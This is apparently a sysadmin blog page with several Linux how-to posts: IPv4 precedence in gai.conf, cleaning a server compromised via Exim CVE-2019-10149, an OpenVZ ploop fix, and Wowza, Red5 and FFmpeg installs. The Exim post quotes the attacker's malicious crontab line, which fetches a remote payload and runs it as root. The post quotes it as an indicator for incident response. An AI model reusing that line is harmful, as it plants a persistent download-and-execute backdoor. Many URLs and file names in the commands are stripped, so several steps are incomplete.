Prefer/Precedence IPv4 over IPv6 for DNS lookups

We had an issue with DNS lookup/Querying the whois servers(Example: while Domain Search/Registration for any TLDs through WHMCS, Domain Manager etc. The tool/system used to timeout whenever the users searched a domain for availability.

We found the following via CLI when telnet’ing to the whois server directly.

[root@host ~]# telnet 43
Trying 2620:74:20::30...
telnet: connect to address 2620:74:20::30: Connection refused
Trying 2620:74:21::30...
telnet: connect to address 2620:74:21::30: Connection refused
Connected to
Escape character is '^]'.

The above indicates it attempts IPv6 DNS lookup first but the whois server doesn’t support or provide it, later our server tries IPv4 DNS lookup and it worked.

The system by default uses AAAA(IPv6) DNS lookups before IPv4 according to the default precedence blocks in /etc/gai.conf (gai stands for getaddrinfo, the standard system call for resolving host names).

As many prefer to disable IPv6 completely and it is not a good solution on the servers which require IPv6 for other purposes, we can try an alternative solution by giving precedence to IPv4 over IPv6 without disabling IPv6.

This is done by changing “precedence ::ffff:0:0/96 10" toprecedence ::ffff:0:0/96 100" in the config file /etc/gai.conf. Check whole /etc/gai.conf to read and understand.

[root@host ~]# grep "::ffff:0:0/96" /etc/gai.conf
#label ::ffff:0:0/96 4
#precedence ::ffff:0:0/96  10
precedence ::ffff:0:0/96  100

If you do not have a /etc/gai.conf(which controls the getaddrinfo() call), you should have an example somewhere within /usr/share/doc (on Centos/RHEL, it is at /usr/share/doc/glibc-common-X.XX.XX/gai.conf) which you can copy over to /etc/gai.conf.

Mine was at:

[root@host ~]# rpm -qa glibc*

[root@host ~]# ll /usr/share/doc/glibc-common-2.17/gai.conf
-rw-r--r--. 1 root root 2584 Jul  3 15:25 /usr/share/doc/glibc-common-2.17/gai.conf

[root@host ~]# cp -pv /usr/share/doc/glibc-common-2.17/gai.conf /etc/
‘/usr/share/doc/glibc-common-2.17/gai.conf’ -> ‘/etc/gai.conf’

Then it started working fine by giving preference to IPv4 over IPv6.

[root@host ~]# telnet 43
Connected to
Escape character is '^]'.
Connection closed by foreign host.

How to clean up a hacked server from the Exim vulnerability CVE-2019-10149 | Temporary workaround | cPanel

The recently reported Exim 4.87 to 4.91 versions vulnerability CVE-2019-10149 is of very intense. Many host servers have already been hacked by now. For the host which is clean by the Gods grace and are still running on the vulnerable Exim and outdated cPanel versions, it is highly recommended to upgrade the cPanel to get Exim patched in the new version 4.92 immediately.

The solution to avoid such a hack issue to upgrade the cPanel to the latest one.

As you have a solution already in place int he above URLs for the clean servers to patch Exim and to avoid the hack issue, I made this document for the unfortunate people whose servers are already root hacked from the Exim vulnerability reported.

Do the following steps to perform a temporary workaround to cleanup compromised server and get atleast its services UP for your customers. But this is not a permanent solution, once you made the following cleanup, make sure to setup a clean server with the same specification and services configuration and also with the latest cPanel and Exim. Then migrate the user accounts from the hacked and cleaned up server to the new server.

An important thing to note is, DO NOT SSH FROM THE HACKED SERVER TO THE NEW DESTINATION SERVER AT ANY CASE WHICH WILL PROBABLY LET THE NEW SERVER ALSO GET INFECTED. kindly avoid that and do always connect from the new server to the hacked source server using the WHM transfer tool.

Signs of the hacked server from this Exim vulnerability CVE-2019-10149:

# crontab -l
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo " localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp

File: /usr/bin/[kthrotlds] [ Not normally found on clean servers ]
Size: 1738544 (1697.796875) [ - Most system files/libraries are less than 25k. Anything larger should be considered suspicious. ]
Changed: Tue Jun 11 19:36:58 2019 [ Approximate date the compromise may have occurred ]
RPM Owned: No - Most system files should be owned by an RPM
sha256sum: c3f26f38cb75cf779eed36a4e7ac32cacd4ae89bdf7dae2a4c4db1afe652d3f0

# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.XXXXuRviCS to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.6k7Xnz

# crontab -e
lstat: No such file or directory

# lsattr /var/spool/cron/root
----i--------e-- /var/spool/cron/root

# exim -bV
Exim version 4.91 #1 built 07-Mar-2019 22:58:08
Copyright (c) University of Cambridge, 1995 - 2018

Here are the steps to clean up the hacked server from the Exim vulnerability CVE-2019-10149:

# service exim stop;chkconfig exim off (::stop exim service fully)
# yum remove exim -y (::remove it if keeps coming back online)
# service crond stop
# service cron stop
# killall -9 kthrotlds
# killall -9 curl wget sh
# yum -y reinstall curl
# exim -bp | exiqgrep -i | xargs exim -Mrm
# rm -fv /root/.cache/.ntp
# chattr -V -ie /etc/cron.d/root
# > /etc/cron.d/root
# chattr -V -ie /var/spool/cron/root
# > /var/spool/cron/root
# chattr -V -ie   /etc/cron.daily/cronlog /etc/cron.d/root  /etc/cron.d/.cronbus /etc/cron.hourly/cronlog /etc/cron.monthly/cronlog /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/root /etc/crontab /root/.cache/ /root/.cache/a /usr/local/bin/nptd /root/.cache/.kswapd /usr/bin/\[kthrotlds\] /root/.ssh/authorized_keys /.cache/* /.cache/.sysud /.cache/.a /.cache/.favicon.ico /.cache/.kswapd /.cache/.ntp >/dev/null 2>&1
# chattr -V -ie /etc/rc.local;chattr -V -ie /root/.ssh/authorized_keys
# sed -i -e '/bin\/npt/d' /etc/rc.local >/dev/null 2>&1
# sed -i -e '/user@localhost/d' /root/.ssh/authorized_keys >/dev/null 2>&1 (:or remove any unsual keys you found there)
# service crond start >/dev/null 2>&1
# service cron start >/dev/null 2>&1

Make sure the hack is not coming. If it is, repeat the above steps once again immediately as things are already in the server memory. Else a better way to create a bash script say and copy the above required commands in sequence to execute immediately.

Once done

# reboot

Once the server is back online.

Check if the above hack files are still present. If not upgrade the cPanel which will also install the latest patched Exim on the server.

# /scripts/upcp --force 

Follow this thread better:

The result should be as follows:

# cat /usr/local/cpanel/version;rpm -qa exim

Later if you see Email delivery issues like as follows:

201X-0X-XX 10:28:26 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 X=TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128 CV=no F=<> rejected RCPT <>: Rejected relay attempt: 'IP.x.x.x' From: '' To: ''
201X-0X-XX 10:28:27 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 Warning: "Detected session with all messages failed"
201X-0X-XX 10:28:27 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 Warning: "Increment slow_fail_block Ratelimit - mail-XXX-XXXcom [IP.x.x.x]:36085 because of all messages failed"

This is probably happening due to the missing contents in the files /etc/localdomains and /etc/remotedomains. Populate contents in it by running the following cPanel script.

# /scripts/checkalldomainsmxs --yes

Restart exim if required.

Please realize the fact that the above steps are not a permanent solution but a temporary workaround to keep things online and to migrate the accounts to a clean server and reinstall the hacked server.

OpenVZ vps creation “Error in check_mount_restrictions (ploop.c:1627)”

I wasn’t able to create new vps in node due to following ploop error.

From the log
Creating image: /vz/private/350.tmp/root.hdd/root.hdd size=2306867K
Creating delta /vz/private/350.tmp/root.hdd/root.hdd bs=2048 size=4614144 sectors v2
Storing /vz/private/350.tmp/root.hdd/DiskDescriptor.xml
Error in check_mount_restrictions (ploop.c:1627): The ploop image can not be used on ext3 or ext4 file system without extents
Failed to create image: Error in check_mount_restrictions (ploop.c:1627): The ploop image can not be used on ext3 or ext4 file system without extents [21]
Destroying container private area: /vz/private/350
Creation of container private area failed


Check whether the partition is on ext4 filesystem or not. Ploop doesn’t work on ext3 filesystem. My node’s /vz partition was on ext3 filesystem.

We cannot simply upgrade the /vz partition from ext3 to ext4 as lots of vps are running on it. Here I have checked the vzctl version and found it was latest one 4.7.x

# vzctl --version
vzctl version 4.7.1

The latest vzctl tries to create template as ploop which is advanced than simfs. Since the partition runs on ext3 filesystem, the safest way to fix the issue is to downgrade the version of vzctl to 4.5.x

version 4.5.1 is not available in openvz anymore. You may need to manually download the rpm of vzctl and vzctl-core from and install it.

Before installing it, remove the current vzctl 4.7.x

# yum remove vzctl
# cd /usr/src
# wget
# wget

# rpm -Uvh vzctl-core-4.5.1-1.x86_64.rpm
Preparing... ########################################### [100%]
1:vzctl-core ########################################### [100%]

# rpm -Uvh vzctl-4.5.1-1.x86_64.rpm
Preparing... ########################################### [100%]
1:vzctl ########################################### [100%]
vz-postinstall: /etc/sysctl.conf: add net.bridge.bridge-nf-call-ip6tables = 1
vz-postinstall: /etc/sysctl.conf: add net.bridge.bridge-nf-call-iptables = 1

# vzctl --version
vzctl version 4.5.1

Create container now 🙂

# vzctl create 101 --ostemplate centos-6-x86_64-cpanel --private /vz/private/101 --root=/vz/root/101 --config configname
Creating container private area (centos-6-x86_64-cpanel)
Performing postcreate actions
CT configuration saved to /etc/vz/conf/101.conf
Container private area was created

Wowza Streaming Engine (RHEL/Centos/Fedora)

Wowza Streaming Engine (known as Wowza Media Server prior to version 4) is unified server software developed by Wowza Media Systems. The server is used for streaming of live and on-demand video, audio, and RIAs (rich Internet applications) over IP networks to desktop, laptop, and tablet computers, mobile devices, IPTV set-top boxes, internet-connected TV sets, and other network-connected devices. The server is a Java application deployable on the following operating systems: Linux, Mac OS X, Solaris, Unix, and Windows.

Installation of Wowza

1) Firt install Java in your server as it is a Java based application.

#yum install java java-openjdk

# java -version
java version "1.6.0_18"
OpenJDK Runtime Environment (IcedTea6 1.8.8) (fedora-
OpenJDK Client VM (build 14.0-b16, mixed mode)

2) Download Wowza installation binary from their site

#cd /usr/src

3) Give permission for execution

#chmod +x WowzaStreamingEngine-4.0.6.rpm.bin

4) Execute it


Do you agree to the above license terms? [yes or no]
Wowza Streaming Engine Manager is a browser-based application for managing the Wowza Streaming Engine software.
Enter an Administrator user name and password that you want to use to sign in to the manager.
Note: User Name and Password are case-sensitive.
User Name: wowza
Confirm Password:
Please enter a Wowza Streaming Engine license key in this format:

((( For the license you may need to purchase from or you can try free license just for installation purpose, they will send it to your mail after signing up)))

Wowza Streaming Engine license key accepted. Thank you!
Installing Wowza Streaming Engine
Preparing... ########################################### [100%]
1:WowzaStreamingEngine ########################################### [100%]

Start Wowza Streaming Engine automatically when this system reboots? [yes or no]
Starting WowzaStreamingEngine (via systemctl):
WowzaStreamingEngine: stopping...
WowzaStreamingEngine stopped

WowzaStreamingEngine stopped

WowzaStreamingEngine: starting...
WowzaStreamingEngine started PID:(1751) [ OK ]
Starting WowzaStreamingEngine (via systemctl):
WowzaStreamingEngineManager: stopping...
WowzaStreamingEngineManager stopped
WowzaStreamingEngineManager stopped
WowzaStreamingEngineManager: starting...
WowzaStreamingEngineManager started PID:(1779) [ OK ]
Install Location:

To access Wowza Streaming Engine Manager, go to http://localhost:8088/enginemanager in a web browser.


# chkconfig --level 345 WowzaStreamingEngine on
# chkconfig --level 345 WowzaStreamingEngineManager on

5) Allow it’s port to accept incoming connections.

# iptables -I INPUT -p tcp --dport 1935 -j ACCEPT

6) Check whether wowza is working?

# netstat -plan | grep :1935
tcp 0 0 :::1935 :::* LISTEN 1352/java

7) Install all examples in wowza
(LiveDVRStreaming, LiveVideoStreaming, ServerSideModules, SHOUTcast, VideoChat, VideoOnDemandStreaming, WebcamRecording)

#cd /usr/local/WowzaStreamingEngine/examples
# ./
Skipping LiveVideoStreaming. Already configured.
Installing LiveDVRStreaming...
Installing ServerSideModules...
Installing SHOUTcast...
Installing VideoChat...
Skipping VideoOnDemandStreaming. Already configured.
Skipping WebcamRecording. Already configured.
If Wowza Streaming Engine is running, you must restart it to see the installed examples.

8) Go to http://WowzaserverIP:8088/enginemanager and supply the user/pass you have given while installation. Enjoy working with Wowza now 🙂




If you see the wowza page getting connection time outs or connection refused error. Check wowza log for details.

# tail -f wowzastreamingengine_error.log
WARN vhost comment 2014-08-18 01:02:39 - - - - - 20.422 - - - - - - - _defaultVHost_ Bind failed, try again ([any]:1935): Address already in use
WARN vhost comment 2014-08-18 01:02:44 - - - - - 25.426 - - - - - - - _defaultVHost_ Bind failed, try again ([any]:1935): Address already in use
WARN vhost comment 2014-08-18 01:02:49 - - - - - 30.429 - - - - - - - _defaultVHost_ Bind failed, try again ([any]:1935): Address already in use
WARN vhost comment 2014-08-18 01:02:54 - - - - - 35.432 - - - - - - - _defaultVHost_ Bind failed, try again ([any]:1935): Address already in use
WARN vhost comment 2014-08-18 01:02:59 - - - - - 40.434 - - - - - - - _defaultVHost_ Bind failed, try again ([any]:1935): Address already in use

I found some other process started using the same port with server IP. I had to kill all the current processes and restart application.

# netstat -plan | grep :1935
tcp 0 0 :::1935 :::* LISTEN 1352/java
# kill -9 1352
# ps auxf | grep -i wowza

Kill all wowza process you get from ps command.

Now start WowzaStreamingEngine and WowzaStreamingEngineManager

# /etc/init.d/WowzaStreamingEngine start
WowzaStreamingEngine stopped

WowzaStreamingEngine: starting...
WowzaStreamingEngine started PID:(2751) [ OK ]
# /etc/init.d/WowzaStreamingEngineManager start
WowzaStreamingEngineManager stopped
WowzaStreamingEngineManager: starting...
WowzaStreamingEngineManager started PID:(2778) [ OK ]


Red5 Media Server: Installation And Configuration (Centos/Fedora/RHEL)

Red5 Media Server delivers a powerful video streaming and multi-user solution to the ©Adobe ©Flash Player and other exciting client technologies. It works based on Java and some of the most powerful open source frameworks, Red5 stands as a solid solution for business of all sizes including the enterprise.

Streaming Video (FLV, F4V, MP4, 3GP)
Streaming Audio (MP3, F4A, M4A, AAC)
Recording Client Streams (FLV and AVC+AAC in FLV container)
Shared Objects
Live Stream Publishing
Protocols: RTMP, RTMPT, RTMPS, and RTMPE

Lets look at the installation and configuration part:

1) First you need to install Java since red5 is a Java server. Use yum to install it.
If you are not sure about the version or proper package to be installed from yum repo, then search it.

# yum search java | grep openjdk
java-1.6.0-openjdk-devel.i686 : OpenJDK Development Environment
java-1.6.0-openjdk.i686 : OpenJDK Runtime Environment
java-1.6.0-openjdk-demo.i686 : OpenJDK Demos
java-1.6.0-openjdk-javadoc.i686 : OpenJDK API Documentation
java-1.6.0-openjdk-plugin.i686 : OpenJDK Web Browser Plugin
java-1.6.0-openjdk-src.i686 : OpenJDK Source Bundle

I am gonna install java-1.6.0-openjdk.i686 and java-1.6.0-openjdk-devel.i686 from it.

#yum install java-1.6.0-openjdk.i686 java-1.6.0-openjdk-devel.i686

2) Now we need to install SVN to retrieve new red5 release from Google SVN repositary.

#yum install subversion

3) Install Ant and Ivy in support for Java
Apache Ant is a Java library and command-line tool that help building software. Ivy is a dependency manager, it manages and controls the JAR files that your project depends on. If you don’t have the JARs, it works by default by taking from the Maven repository directly, which can make project setup a lot easier.

Download binary form of apache-ant(NOT THE SOURCE CODE)

# cd /usr/src
# wget (:::You can download latest from
# tar xvf apache-ant-1.9.4-bin.tar.gz
# mv apache-ant-1.9.4 /usr/local/ant

Make a symlink for ant binary to /usr/bin for the shortcut and easiness to access it.

#ln -s /usr/local/ant/bin/ant /usr/bin/ant

Download Ivy from Apache repositary

# cd /usr/src
# svn co ivy
# cd ivy
# ant jar

Wait for few minutes for process to be over. Once it is success, you will see the Build Complete Message.

# cp build/artifact/jars/ivy.jar /usr/local/ant/lib/   (::: Since you are in path cd /usr/src/ivy)

4) Export Variables for Ant and Java:

Java and Ant is in place now, now we need to make sure we set Environment Variables. They are global variables with paths specified to different binaries or applications. ANT and JAVA will need those.

# export ANT_HOME=/usr/local/ant
# export JAVA_HOME=/usr/lib/jvm/java
# export PATH=$PATH:/usr/local/ant/bin

5) Actual Installation of Red5 Server begins

We need to fetch the Red5 source from Google SVN repositary.

# cd /usr/src
# svn co red5
# mv red5 /usr/local/
# cd /usr/local/red5

(This is the folder where all the source files reside. From here on, we prepare and build the red5 source)

# ant prepare
# ant dist

Wait for sometime for the process to be completed. Once it is over, you will see message “BUILD SUCCESSFUL” at the end.

Copy the conf directory from the dist folder to the current directory and test the red5 installation.

# cp -r dist/conf .             (::: Since you are in path /usr/local/red5)
# ./

You will see a lot of process going on in screen and it starts the Red5 server.

Check whether the ports 5080 and 1935 are listening or not in a second/duplicate shell

# netstat -plan | grep -E ‘:5080|:1935’
tcp 0 0 :::1935 :::* LISTEN 1309/java
tcp 0 0 :::5080 :::* LISTEN 1309/java

Test if server works by checking the url http://yourserverIP:5080

Make sure you enable incoming connections to ports 5080 and 1935 in server.

# iptables -A INPUT -p tcp -m tcp –dport 5080 -j ACCEPT
# iptables -A INPUT -p tcp -m tcp –dport 1935 -j ACCEPT
[[[NOTE::: The red5 runs only as long as you keep the terminal window open since you started running the script in it. It will stop running if you close shell which is not an efficient way to run red5 server like that way. You need to make sure it can run by its own initiative]]]

You may need to set the script starts running while server boots up, do the following for it.

#vi /root/

Enter the following commands in it.

cd /usr/local/red5/

#chmod +x /root/

Set this script in file /etc/rc.local so that it will start running along with start up scripts in server.
So the rc.local would like as shown below:
# cat /etc/rc.local
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don’t
# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local
sh /root/ &

((In above the “&” at the tail end of command “sh /root/” is run the process in background))
6) Setup an Init script for Red5 server

# vi /etc/init.d/red5

Then enter the following script in it.

# For RedHat and cousins:
# chkconfig: 2345 85 85
# description: Red5 flash streaming server
# processname: red5
# Source function library
. /etc/rc.d/init.d/functions
[ -r /etc/sysconfig/red5 ] && . /etc/sysconfig/red5
case “$1” in
echo -n $”Starting $PROG: ”
$DAEMON >/dev/null 2>/dev/null &
if [ $RETVAL -eq 0 ]; then
echo $! > $PIDFILE
touch /var/lock/subsys/$PROG
[ $RETVAL -eq 0 ] && success $”$PROG startup” || failure $”$PROG startup”
echo -n $”Shutting down $PROG: ”
killproc -p $PIDFILE
[ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/$PROG
$0 stop
$0 start
status $PROG -p $PIDFILE
echo $”Usage: $0 {start|stop|restart|status}”
exit $RETVAL

Assign execute permission to red5 script

# chmod +x /etc/init.d/red5

Now start the service

# service red5 start OR /etc/init.d/red5 start

Set Red5 to start along with start up programs while server booting

# chkconfig –add red5
# chkconfig red5 on

To install some RED5 demos

# cd /usr/local/red5/webapps/root
# svn checkout

To install some demo apps


Then install Admin demo and Ofla Demo from the page

Access Demo Apps in Red5


Test ofla demo


Then correct rtmp url like rtmp://yourserverip/oflaDemo and hit connect. Choose any of the demos from the list and play it.


Test Publisher to live stream, record videos etc.

You will see three tabs on left side server, video, audio

In server tab, change the location to rtmp://yourserverip/oflaDemo and on the video tab, select your cam from Device scroll list.


All the above would work fine if you follow the instructions correctly 🙂


Some error you may encounter while the installation time

1) During the step ant prepare and ant dist , you may sometime reach at the following error.

[ivy:resolve] ::::::::::::::::::::::::::::::::::::::::::::::
[ivy:resolve] :: org.apache.commons#commons-modeler;2.0.1: not found
[ivy:resolve] :: red5#xmlrpc;2.0.1: not found
[ivy:resolve] ::::::::::::::::::::::::::::::::::::::::::::::

For this change the following path in file ivysettings.xml in directory /usr/local/red5/

replace the
<artifact pattern=”[organisation]/[artifact]-[revision].[ext]”/>
<artifact pattern=”[artifact]/[artifact]/[revision]/[artifact]-[revision].[ext]”/>



Install FFMPEG in Fedora/Centos/RHEL

FFmpeg is a free software project that produces libraries and programs for handling multimedia data. FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge. No matter if they were designed by some standards committee, the community or a corporation.

Reference from

How to install it?

(((First of all, please note the below installation steps are based on working with fedora/centos/rhel)))

1) Install the additional repo

Download it from and choose it with your servers exact architecture and OS version.

I installed,

rpm -Uhv

Since I am running Centos 6.x i686.

Update repository

# yum -y update

Install all necessary packages in support for ffmpeg

# yum install glibc gcc gcc-c++ autoconf automake libtool git make nasm pkgconfig
# yum install SDL-devel a52dec a52dec-devel alsa-lib-devel faac faac-devel faad2 faad2-devel
# yum install freetype-devel giflib gsm gsm-devel imlib2 imlib2-devel lame lame-devel libICE-devel libSM-devel libX11-devel
# yum install libXau-devel libXdmcp-devel libXext-devel libXrandr-devel libXrender-devel libXt-devel
# yum install libogg libvorbis vorbis-tools mesa-libGL-devel mesa-libGLU-devel xorg-x11-proto-devel zlib-devel
# yum install libtheora theora-tools
# yum install ncurses-devel
# yum install libdc1394 libdc1394-devel
# yum install amrnb-devel amrwb-devel opencore-amr-devel
2) Install xvid
It is a video codec library following the MPEG-4 standard, specifically MPEG-4 Part 2 Advanced Simple Profile (ASP). It uses ASP features such as b-frames, global and quarter pixel motion compensation, lumi masking, trellis quantization, and H.263, MPEG and custom quantization matrices.

#cd /opt
#tar xzvf xvidcore-1.3.2.tar.gz
#cd xvidcore/build/generic
#./configure –prefix=”$HOME/ffmpeg_build”
(::: Here $HOME means, since you run this as root, the home directory will be choosen as /root)
#make install

3) Install LibOgg
It is designed to provide for efficient streaming and manipulation of high quality digital multimedia.

#cd /opt
#tar xzvf libogg-1.3.1.tar.gz
#cd libogg-1.3.1
#./configure –prefix=”$HOME/ffmpeg_build” –disable-shared
#make install

4) Install Libvorbis
It is the reference implementation of the Vorbis codec. It is the lowest-level interface to the Vorbis encoder and decoder, working with packets directly.

#cd /opt
#tar xzvf libvorbis-1.3.4.tar.gz
#cd libvorbis-1.3.4
#./configure –prefix=”$HOME/ffmpeg_build” –with-ogg=”$HOME/ffmpeg_build” –disable-shared
#make install

5) Install Libtheora
It is a free lossy video compression format. It is developed by the Xiph.Org Foundation and distributed without licensing fees alongside their other free and open media projects, including the Vorbis audio format and the Ogg container.

#cd /opt
#tar xzvf libtheora-1.1.1.tar.gz
#cd libtheora-1.1.1
#./configure –prefix=”$HOME/ffmpeg_build” –with-ogg=”$HOME/ffmpeg_build” –disable-examples –disable-shared –disable-sdltest –disable-vorbistest
#make install

6) Install Aacenc
It’s AAC(Advanced Audio Coding) Decoder.

# cd /opt
# wget
# tar xzvf vo-aacenc-0.1.3.tar.gz
# cd vo-aacenc-0.1.3
# ./configure –prefix=”$HOME/ffmpeg_build” –disable-shared
# make
# make install

7) Install Yasm
It is an assembler and disassembler for the Intel x86 architecture. It can be used to write 16-bit, 32-bit (IA-32) and 64-bit (x86-64) programs. Yasm is a full rewrite of Netwide Assembler (NASM).

# yum remove yasm
# cd /opt
# wget
# tar xzfv yasm-1.2.0.tar.gz
# cd yasm-1.2.0
# ./configure –prefix=”$HOME/ffmpeg_build” –bindir=”$HOME/bin”
# make
# make install
# export “PATH=$PATH:$HOME/bin”

8) Install Libvpx
It is a video compression format owned by Google.

# cd /opt
# git clone
# cd libvpx
# git checkout tags/v.1.3.0
# ./configure –prefix=”$HOME/ffmpeg_build” –disable-examples
# make
# make install

9) Install X264
It is a free software library for encoding video streams into the H.264/MPEG-4 AVC format. It is released under the terms of the GNU General Public License.

# cd /opt
# git clone git://
# cd x264
# ./configure –prefix=”$HOME/ffmpeg_build” –bindir=”$HOME/bin” –enable-static
# make
# make install

10) Configure Libraries

# export LD_LIBRARY_PATH=/usr/local/lib/
# echo /usr/local/lib >> /etc/
# ldconfig (:::It configures dynamic linker run-time bindings)
11) Now compile FFMPEG

# cd /opt
# git clone git://
# cd ffmpeg
# git checkout release/2.2
# PKG_CONFIG_PATH=”$HOME/ffmpeg_build/lib/pkgconfig”

(((Following compile options have to given line by line)))

# ./configure –prefix=”$HOME/ffmpeg_build” –extra-cflags=”-I$HOME/ffmpeg_build/include” –extra-ldflags=”-L$HOME/ffmpeg_build/lib” –bindir=”$HOME/bin” \
–extra-libs=-ldl –enable-version3 –enable-libopencore-amrnb –enable-libopencore-amrwb –enable-libvpx –enable-libfaac \
–enable-libmp3lame –enable-libtheora –enable-libvorbis –enable-libx264 –enable-libvo-aacenc –enable-libxvid –disable-ffplay \
–enable-gpl –enable-postproc –enable-nonfree –enable-avfilter –enable-pthreads

(((The –arch=x86_64 option should only be used if you are on a 64Bit System!)))

# make
# make install


An error you might come across while compiling FFMPEG

Error: libfaac not found
# cd /opt
# wget
# cd faac-1.28
# ./configure –prefix=”$HOME/ffmpeg_build” –disable-shared
# make
# make install

Then compile ffmpeg again in step 11.
Some error you encounter after compilation
# ffmpeg -version
ffmpeg: error while loading shared libraries: cannot open shared object file: No such file or directory

For this,

# ldd `which ffmpeg` => (0x00872000) => /lib/ (0x07533000) => /usr/lib/ (0x00110000) => /lib/ (0x007e7000) => not found => /usr/lib/ (0x00f68000) => /usr/lib/ (0x00a3a000) => /usr/lib/ (0x001b0000) => /lib/ (0x0082b000) => /lib/ (0x00816000) => /lib/ (0x0080b000) => /lib/ (0x00804000) => /lib/ (0x0065a000)
/lib/ (0x00638000) => /usr/lib/ (0x07afb000) => /lib/ (0x077af000)

# find / -iname

# ln -s /root/ffmpeg_build/lib/ /lib/

# ll /lib/
lrwxrwxrwx. 1 root root 40 Aug 9 17:37 /lib/ -> /root/ffmpeg_build/lib/
Finally you are done with FFMPEG installation 🙂

# ffmpeg -version
ffmpeg version n2.2.6
built on Aug 7 2014 17:44:37 with gcc 4.4.5 (GCC) 20101112 (Red Hat 4.4.5-2)
configuration: –prefix=/root/ffmpeg_build –extra-cflags=-I/root/ffmpeg_build/include –extra-ldflags=-L/root/ffmpeg_build/lib –bindir=/root/bin –extra-libs=-ldl –enable-version3 –enable-libopencore-amrnb –enable-libopencore-amrwb –enable-libvpx –enable-libfaac –enable-libmp3lame –enable-libtheora –enable-libvorbis –enable-libx264 –enable-libvo-aacenc –enable-libxvid –disable-ffplay –enable-gpl –enable-postproc –enable-nonfree –enable-avfilter –enable-pthreads
libavutil 52. 66.100 / 52. 66.100
libavcodec 55. 52.102 / 55. 52.102
libavformat 55. 33.100 / 55. 33.100
libavdevice 55. 10.100 / 55. 10.100
libavfilter 4. 2.100 / 4. 2.100
libswscale 2. 5.102 / 2. 5.102
libswresample 0. 18.100 / 0. 18.100
libpostproc 52. 3.100 / 52. 3.100


See complete list of ffmpeg options using # ffmpeg -h full | less
Now I am just showing, how to convert a video type to another format. I am converting a mp4 video to avi

# ffmpeg -i my_video.mp4 my_video.avi
ffmpeg version n2.2.6 Copyright (c) 2000-2014 the FFmpeg developers
built on Aug 7 2014 17:44:37 with gcc 4.4.5 (GCC) 20101112 (Red Hat 4.4.5-2)
configuration: –prefix=/root/ffmpeg_build –extra-cflags=-I/root/ffmpeg_build/include –extra-ldflags=-L/root/ffmpeg_build/lib –bindir=/root/bin –extra-libs=-ldl –enable-version3 –enable-libopencore-amrnb –enable-libopencore-amrwb –enable-libvpx –enable-libfaac –enable-libmp3lame –enable-libtheora –enable-libvorbis –enable-libx264 –enable-libvo-aacenc –enable-libxvid –disable-ffplay –enable-gpl –enable-postproc –enable-nonfree –enable-avfilter –enable-pthreads
libavutil 52. 66.100 / 52. 66.100
libavcodec 55. 52.102 / 55. 52.102
libavformat 55. 33.100 / 55. 33.100
libavdevice 55. 10.100 / 55. 10.100
libavfilter 4. 2.100 / 4. 2.100
libswscale 2. 5.102 / 2. 5.102
libswresample 0. 18.100 / 0. 18.100
libpostproc 52. 3.100 / 52. 3.100
Input #0, mov,mp4,m4a,3gp,3g2,mj2, from ‘my_video.mp4’:
major_brand : FACE
minor_version : 1337
compatible_brands: isomavc1FACE
creation_time : 2013-01-18 03:43:54
Duration: 00:00:59.23, start: 0.000000, bitrate: 325 kb/s
Stream #0:0(und): Video: h264 (Constrained Baseline) (avc1 / 0x31637661), yuv420p, 400×224, 230 kb/s, 29.97 fps, 29.97 tbr, 30k tbn, 59.94 tbc (default)
creation_time : 2013-01-18 03:43:54
handler_name : /tmp/tmpIZkUUJ/540138109343874.mp4_video.264 – Imported with GPAC 0.4.6-DEV-rev3544
Stream #0:1(und): Audio: aac (mp4a / 0x6134706D), 44100 Hz, stereo, fltp, 93 kb/s (default)
creation_time : 2013-01-18 03:43:54
handler_name : /tmp/tmpIZkUUJ/540138109343874.mp4_audio.aac – Imported with GPAC 0.4.6-DEV-rev3544
Output #0, avi, to ‘my_video.avi’:
major_brand : FACE
minor_version : 1337
compatible_brands: isomavc1FACE
ISFT : Lavf55.33.100
Stream #0:0(und): Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 400×224, q=2-31, 200 kb/s, 29.97 tbn, 29.97 tbc (default)
creation_time : 2013-01-18 03:43:54
handler_name : /tmp/tmpIZkUUJ/540138109343874.mp4_video.264 – Imported with GPAC 0.4.6-DEV-rev3544
Stream #0:1(und): Audio: mp3 (libmp3lame) (U[0][0][0] / 0x0055), 44100 Hz, stereo, fltp (default)
creation_time : 2013-01-18 03:43:54
